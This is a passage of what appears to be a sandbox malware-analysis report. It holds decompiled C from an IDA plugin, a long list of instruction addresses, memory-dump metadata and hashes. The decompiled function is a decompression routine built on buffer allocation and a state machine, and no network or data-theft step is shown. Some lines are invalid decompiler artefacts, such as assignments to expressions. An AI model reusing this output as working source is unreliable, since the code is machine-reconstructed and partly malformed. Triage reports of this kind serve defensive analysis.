												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406fbb
0x00406fbb
0x00406fbf
0x00406fcc
0x00406fd6
0x00000000
0x00406fc1
0x00406fc1
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x0040726a
0x0040726a
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a
0x00000000
0x00406fbf

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F07() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
